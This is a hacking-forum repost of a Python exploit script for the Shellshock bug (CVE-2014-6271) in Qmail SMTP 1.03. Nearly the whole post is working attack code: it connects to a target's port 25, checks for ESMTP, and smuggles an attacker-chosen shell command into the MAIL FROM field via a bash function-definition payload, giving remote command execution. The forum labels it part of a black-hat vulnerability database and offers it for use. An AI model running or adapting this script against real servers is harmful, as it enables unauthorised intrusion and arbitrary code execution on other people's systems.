跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Qmail SMTP 1.03 - Bash Environment Variable Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3

from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

TARGET = sys.argv[1]
MAILTO = sys.argv[2]
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 25))

res = s.recv(1024)
if 'ESMTP' not in str(res):
    print('[!] No ESMTP detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] ESMTP detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。